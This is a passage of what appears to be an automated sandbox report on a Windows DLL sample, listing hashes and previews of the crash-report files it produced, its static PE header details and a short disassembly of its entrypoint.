                                                                                                                                                                      SHA-512:534B3863EF98E786BD87C406F74DE75D0FFBC8BBFF41BB989EFE584B86A94DB82ACAE5D56ADEC6CCA585C49A7672E428034F7EDF578A184B954CB280E41C5E47
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.0.5.6.7.6.4.5.3.9.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.0.5.8.2.1.4.5.3.2.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.0.b.0.f.d.b.-.a.9.3.9.-.4.d.d.8.-.8.0.c.1.-.a.8.1.1.c.8.2.9.9.f.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.9.5.e.8.7.b.-.9.d.e.9.-.4.9.1.2.-.9.1.9.1.-.c.d.b.7.d.8.d.f.8.9.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.c.8.-.0.0.0.1.-.0.0.1.7.-.a.1.8.2.-.1.6.d.6.2.a.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1498.tmp.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4771
                                                                                                                                                                      Entropy (8bit):4.489938918942838
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:cvIwSD8zsmJgtWI9siAAWSC8Bb8fm8M4JCds0MFf+q8vjs0c4SrS4d:uITf8WESNWJSuKRcDW4d
                                                                                                                                                                      MD5:BF63B69EAC990AB6D87408C4E4F97D3F
                                                                                                                                                                      SHA1:85D06704174C9C8FE1742B02F9911C07788C7E63
                                                                                                                                                                      SHA-256:44EEF58AE3C49362B39C338932BD7640F10E1E481B6BC707393B2E5D1EE96EB2
                                                                                                                                                                      SHA-512:2653F3BE41DE081740D62E094CBA6C91DC09DF55509165C3416E049D854D3200E3E2D5D8B2F8BA2C7FEE7B0139A0F0CF349624768440D1CEED0EE52456BE8627
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CE3.tmp.dmp
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:36:21 2021, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):59254
                                                                                                                                                                      Entropy (8bit):1.9634863542101364
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:aj0QkYA4dJtQhlS2DK0NZh7uP5xZU7KcLG4vPuEeNKolE6ifI7QnSE1Wz9d3:aowbtSbDnhoz/wG4vP4NrlE6lQSiQL3
                                                                                                                                                                      MD5:21FC690E719CA0A2B0555CAF4DC9894F
                                                                                                                                                                      SHA1:9FFF80005C49B84DEDB89A67E403342106D31056
                                                                                                                                                                      SHA-256:0B2CFC574556075A4994FF5510FFFD0DEA968910B8B08E8D160F9E73B2C73E91
                                                                                                                                                                      SHA-512:8482E0DF1711B6CA87A192E236CDCDB636DE710DCB2FEFF3BF73F191F31488E44D192192813877F8B6FC99EB7B4875787C215536C7BEA8325BDF77D388A63029
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T...........a.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER39F1.tmp.WERInternalMetadata.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8306
                                                                                                                                                                      Entropy (8bit):3.6948125197877575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNi2IA6y6G6YWo651WgmfTkOSDCpDT89b5Ssffzm:RrlsNim63G6YJ6KgmfTkOS35RfS
                                                                                                                                                                      MD5:63792DA1DF75FF4D2EC7D9A25ACC5AEF
                                                                                                                                                                      SHA1:C7942D021FA364788DD729A675DFB805358CBA84
                                                                                                                                                                      SHA-256:831350964B1B96FC83D883BAD10563D9F8CB01B29865BC917948403161B0D1B4
                                                                                                                                                                      SHA-512:22B983D28FBC71ECE8D0BDDFA26ACE778DA8ACCEE2F9836D3864253F584031E46EBE19D82283F9416B23124D7A94633942A0E15420624E847100AE775606F40C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.2.0.<./.P.i.d.>.......
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F13.tmp.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4630
                                                                                                                                                                      Entropy (8bit):4.458084179540214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:cvIwSD8zs9JgtWI9siAAWSC8BL8fm8M4JCds9FC+q8/5Z4SrSmd:uITfXWESNmJEGDWmd
                                                                                                                                                                      MD5:C490845CB287C90988FD6F6CF567DD28
                                                                                                                                                                      SHA1:5C7BEE2DC7C4B85A592B569558E138991878A7D0
                                                                                                                                                                      SHA-256:5138F57A3B495A7B2638475C4F61D3851192202E4689A4749E4954CE0AA70680
                                                                                                                                                                      SHA-512:C4C4A55A9D2B5A4B7672168C3ED968A3CDF143E07B244DC6F388360EC9E597C0EB5A48BF2DF40D590195B542FCE84CC2F70FDECDF0570F9EA872080EA8D94987
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206167" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0.tmp.dmp
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:36:11 2021, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):34730
                                                                                                                                                                      Entropy (8bit):2.463952054231091
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:AsYKWkS1nV/WjP5MUmpISGG+0CszdbdE1lE1RHEHnlzq:AfrkSwqUo/+0Cszwl0R4lzq
                                                                                                                                                                      MD5:7A5646D47572BB8CFF0CC61340DF4203
                                                                                                                                                                      SHA1:980925704E4ED1FAFAA9C6152E358BE9E1FFA2A9
                                                                                                                                                                      SHA-256:28DEA90303D7A8DA075BBD36DCCAC8FBBDE8C40515F4DFD39D4770E174B195B0
                                                                                                                                                                      SHA-512:14FB9C68EDBD1A420B2637FEDE0B72D722AC9B9A79606046B79F5E9FD78582E02DAAD053B18B1655ADC003D0D8A9B28F2222B134FF57DBDA772342D3C2980461
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T...........i.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB40.tmp.WERInternalMetadata.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8402
                                                                                                                                                                      Entropy (8bit):3.6993822896284474
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNimj06JVQA6YWDO6ZVthxmgmf8KS9Cpro89bY0sfJIm:RrlsNio06EA6YYO6ZVthxmgmf8KSAYn7
                                                                                                                                                                      MD5:F76740664610671DA6DEC7F8DBF0BEF3
                                                                                                                                                                      SHA1:C0C405E091ED53B8CA110B8885E8BA214D4EC0FB
                                                                                                                                                                      SHA-256:2F27E2B019C3985C6509E88329774C77C5B641DB3EBE14D0F666FD314ABA23F3
                                                                                                                                                                      SHA-512:78218236DD3D944A2FDC43A321C85607EE6B3D8D7AB6BBD0FA217F05F91C223164E00D7DA9BF909D98507E4BD65C6C2DB010EB69A19DE90A175D90DE0128369D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.9.2.<./.P.i.d.>.........
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF86.tmp.WERInternalMetadata.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8404
                                                                                                                                                                      Entropy (8bit):3.699506403638675
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNi9h6tR6YWt6ZVthxmgmf8KS9CprK89bhrsfVLm:RrlsNib6r6Ys6ZVthxmgmf8KSGhwfU
                                                                                                                                                                      MD5:53258A3836AA706F17BA12F50C7F4658
                                                                                                                                                                      SHA1:B0E270CACDF35F9F6B281217868575FF1AB3BB40
                                                                                                                                                                      SHA-256:9E0F6E226E4E0029FE1BF4DD7566B37C712481A0D66B09A25E0FB1E9C86C88E9
                                                                                                                                                                      SHA-512:248F418465686AE8B618B8103B7109F3277DEBC857AA6B82BD6D0DBF0F3B26948792CD0EFAFECCA0328BF68C084951A707CE14E4C44031CDECCC0C3C65B3266A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.4.0.<./.P.i.d.>.......
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF87.tmp.xml
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4771
                                                                                                                                                                      Entropy (8bit):4.488552391834352
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:cvIwSD8zsmJgtWI9siAAWSC8B48fm8M4JCds0MFtP+q8vjs0pI4SrSMd:uITf8WESNDJSCPKRpIDWMd
                                                                                                                                                                      MD5:3C8D2B1AA773525A81E1A2FDB24312D9
                                                                                                                                                                      SHA1:DFD4CA5442CCCA191958EA7501F62BE3DF399B66
                                                                                                                                                                      SHA-256:F49CDC925BE0BE28FB9BC0214F8DF9E51C17D24497FBA4B518A7F70A01A1EDB7
                                                                                                                                                                      SHA-512:8DAAD62180F08DDDC59C4312FF54281D540D15493497B0C192B7E5B17DF8E33AF9223DA5E1526D325B623E57DA6169EF6A5FEC538850969AC34618D48700AD01
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE20.tmp.dmp
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:36:09 2021, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):34688
                                                                                                                                                                      Entropy (8bit):2.4757425683465253
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:m/YknY/MxLP5MUmpISGG+0Qsz7zMJsCK/YOrYno1/hAqAPkH0nmMuS:mQkhjqUo/+0Qszf/YUYno1KhU0m5S
                                                                                                                                                                      MD5:E74FA668049BE728B187D9684BC91264
                                                                                                                                                                      SHA1:DF675FD3B4740E011452A38C5CE42286BEB8BB62
                                                                                                                                                                      SHA-256:6442EE5B6A21B283BE6062B04ACBB2E2BC2B23830FB360F459BFA216F6A4BAA8
                                                                                                                                                                      SHA-512:6BFA6C0A16C5BDF78EFBB7924CD25834F50EA65BEC6502703B70B100B201F723A8AC479CFF48CD47856AEB6DF3113327EADE66AE551B2DE2C7D3EDD1691E7AD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T.......|...^.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.669873789159674
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:6yDD19jMIu.dll
                                                                                                                                                                      File size:718336
                                                                                                                                                                      MD5:903cf677ba834a968b42bd71e4626a9d
                                                                                                                                                                      SHA1:c751f3ab4612917d15967fc1f0591e674c2e56ca
                                                                                                                                                                      SHA256:b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
                                                                                                                                                                      SHA512:b81d6b419c05ac351d086ab9d439b7cf2d8db21208f85b13e483bacb800a811890ca7fc3ce2295d2861f3323b0d52725e27f42758ef4ec6312018b4a7a249095
                                                                                                                                                                      SSDEEP:12288:1UAQSx16fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsF:1z3x16fq8Np6bTPPaBreaZlYCOSVol2S
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................."w|.............].......].......]......."wf.............].......].......]...............].......Rich...........

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x1003ab77
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x10000000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                      Time Stamp:0x5F6FF725 [Sun Sep 27 02:21:25 2020 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      push ebp
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                                                      jne 00007F59789E8407h
                                                                                                                                                                      call 00007F59789E8EF2h
                                                                                                                                                                      push dword ptr [ebp+10h]
                                                                                                                                                                      push dword ptr [ebp+0Ch]
                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                      call 00007F59789E82AAh
                                                                                                                                                                      add esp, 0Ch
                                                                                                                                                                      pop ebp
                                                                                                                                                                      retn 000Ch
                                                                                                                                                                      mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                      pop ecx
                                                                                                                                                                      pop edi
                                                                                                                                                                      pop edi
                                                                                                                                                                      pop esi
                                                                                                                                                                      pop ebx
                                                                                                                                                                      mov esp, ebp
                                                                                                                                                                      pop ebp
                                                                                                                                                                      push ecx
                                                                                                                                                                      ret
                                                                                                                                                                      mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                      xor ecx, ebp
                                                                                                                                                                      call 00007F59789E8003h
                                                                                                                                                                      jmp 00007F59789E83E0h
                                                                                                                                                                      mov ecx, dword ptr [ebp-14h]
                                                                                                                                                                      xor ecx, ebp
                                                                                                                                                                      call 00007F59789E7FF2h
                                                                                                                                                                      jmp 00007F59789E83CFh
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      mov dword ptr [eax], ebp
                                                                                                                                                                      mov ebp, eax
                                                                                                                                                                      mov eax, dword ptr [100AA0D4h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr [ebp-04h]
                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                                                      ret
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      mov dword ptr [eax], ebp
                                                                                                                                                                      mov ebp, eax
                                                                                                                                                                      mov eax, dword ptr [100AA0D4h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      push eax
                                                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                                                      push dword ptr [ebp-04h]
                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                                                      ret
                                                                                                                                                                      push eax
                                                                                                                                                                      inc dword ptr fs:[eax]

                                                                                                                                                                      Data Directories

                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                      Sections

